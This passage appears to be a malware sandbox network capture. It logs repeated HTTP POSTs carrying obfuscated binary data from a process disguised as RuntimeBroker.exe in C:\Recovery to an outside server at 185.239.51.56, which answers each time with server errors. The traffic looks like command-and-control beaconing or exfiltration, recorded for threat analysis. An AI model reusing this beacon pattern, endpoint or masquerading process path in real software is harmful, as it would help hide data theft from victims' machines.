116 | 192.168.2.4 | 50123 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:38.192086935 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:38.552119017 CET | 2504 | OUT | Data Raw
Jan 1, 2025 02:28:38.912977934 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:38.921545982 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.4 | 50124 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:39.052664995 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:39.409873009 CET | 2504 | OUT | Data Raw
Jan 1, 2025 02:28:39.754014015 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:39.761471033 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.4 | 50125 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:39.894123077 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:40.253391027 CET | 2504 | OUT | Data Raw


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.4 | 50126 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:40.446799040 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:40.804219961 CET | 1600 | OUT | Data Raw
Jan 1, 2025 02:28:41.149887085 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:41.158845901 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.4 | 50127 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:40.564219952 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:40.909902096 CET | 2504 | OUT | Data Raw
                                                                                                  Jan 1, 2025 02:28:41.266350985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:41.274657011 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:41 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  121 | 192.168.2.4 | 50128 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:41.396079063 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2488
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:41.753556013 CET | 2488 | OUT | Data Raw: 56 53 5e 52 5f 5d 5b 52 5f 5a 5a 53 57 59 56 56 5f 5c 5d 47 51 51 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VS^R_][R_ZZSWYVV_\]GQQWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A<=!1$&\8Z+*(^*"%57;0'+2&_,-"^%#[.>
                                                                                                  Jan 1, 2025 02:28:42.118315935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:42.256803036 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:42 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  122 | 192.168.2.4 | 50129 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:42.387518883 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:42.737791061 CET | 2504 | OUT | Data Raw: 53 58 5e 56 5a 5d 5b 52 5f 5a 5a 53 57 5c 56 51 5f 55 5d 48 51 56 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SX^VZ][R_ZZSW\VQ_U]HQVW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C??!"(&$;==79?(5!5%74'(([&49.="^%#[.2
                                                                                                  Jan 1, 2025 02:28:43.117933989 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:43.129882097 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:43 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  123 | 192.168.2.4 | 50130 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:43.260581017 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:43.612817049 CET | 2504 | OUT | Data Raw: 56 5f 5e 5f 5f 58 5e 56 5f 5a 5a 53 57 5c 56 54 5f 5a 5d 42 51 51 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^__X^V_ZZSW\VT_Z]BQQW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+<.Z";2+86\?$(&!>48%;_%:Y9="^%#[.2
                                                                                                  Jan 1, 2025 02:28:43.962426901 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:44.100652933 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:43 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  124 | 192.168.2.4 | 50131 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:44.223597050 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:44.582098961 CET | 2504 | OUT | Data Raw: 56 59 5e 56 5f 5d 5e 53 5f 5a 5a 53 57 5a 56 56 5f 5a 5d 47 51 5c 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY^V_]^S_ZZSWZVV_Z]GQ\WP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?&_52282+'9<:5"4^,0&*,="^%#[.*
                                                                                                  Jan 1, 2025 02:28:44.943857908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:44.951380968 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:44 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  125 | 192.168.2.4 | 50132 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:45.084901094 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:45.440943003 CET | 2504 | OUT | Data Raw: 53 5e 5b 52 5a 5e 5b 52 5f 5a 5a 53 57 5e 56 53 5f 5a 5d 42 51 5c 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[RZ^[R_ZZSW^VS_Z]BQ\W]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B(Z*X"8Y1,*(4](X#62Z"+(0;^1--"^%#[.
                                                                                                  Jan 1, 2025 02:28:45.794415951 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:45.802541971 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:45 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  126 | 192.168.2.4 | 50133 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:45.933737040 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  127 | 192.168.2.4 | 50134 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:46.165620089 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:46.519304991 CET | 1600 | OUT | Data Raw: 53 59 5e 50 5f 5d 5b 52 5f 5a 5a 53 57 5a 56 57 5f 58 5d 48 51 54 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^P_][R_ZZSWZVW_X]HQTWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+>Y#"$]1,[:?&?8%Y65)7(+U0('&7."^%#[.*
                                                                                                  Jan 1, 2025 02:28:46.867381096 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:46.875897884 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:46 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  128 | 192.168.2.4 | 50135 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:46.288855076 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:46.646106958 CET | 2504 | OUT | Data Raw: 56 5e 5e 52 5f 5a 5b 54 5f 5a 5a 53 57 5b 56 5e 5f 59 5d 40 51 50 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^R_Z[T_ZZSW[V^_Y]@QPWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B<,)6"<&0[,-*=4++9X"C=4;?T0;+%9-"^%#[..
                                                                                                  Jan 1, 2025 02:28:46.990674019 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:46.998455048 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:46 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  129 | 192.168.2.4 | 50136 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:47.134264946 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:47.490093946 CET | 2504 | OUT | Data Raw: 53 5e 5b 57 5f 58 5e 54 5f 5a 5a 53 57 5f 56 54 5f 58 5d 46 51 54 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[W_X^T_ZZSW_VT_X]FQTWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@<,Z!!$Y'3+/-"<>](+&!%6 +3P$+8\%4&X."^%#[.>
                                                                                                  Jan 1, 2025 02:28:47.835978985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:47.842993021 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:47 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  130 | 192.168.2.4 | 50137 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:47.977180958 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:48.331533909 CET | 2504 | OUT | Data Raw: 56 5a 5e 57 5f 5c 5e 50 5f 5a 5a 53 57 5f 56 53 5f 5c 5d 44 51 52 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^W_\^P_ZZSW_VS_\]DQRWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A(/!"2$Y' '/=+B1*8_!&* ;?P'1')-"^%#[.>
                                                                                                  Jan 1, 2025 02:28:48.697825909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:48.835150003 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:48 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  131 | 192.168.2.4 | 50138 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:48.962456942 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:49.663675070 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:49.672398090 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:49 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.4 | 50139 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:49.806793928 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:50.509098053 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:50.518691063 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.4 | 50140 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:50.646095991 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:51.355667114 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:51.371645927 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.4 | 50141 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:51.503245115 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.4 | 50142 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:51.910878897 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:52.613178968 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:52.621011972 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.4 | 50143 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
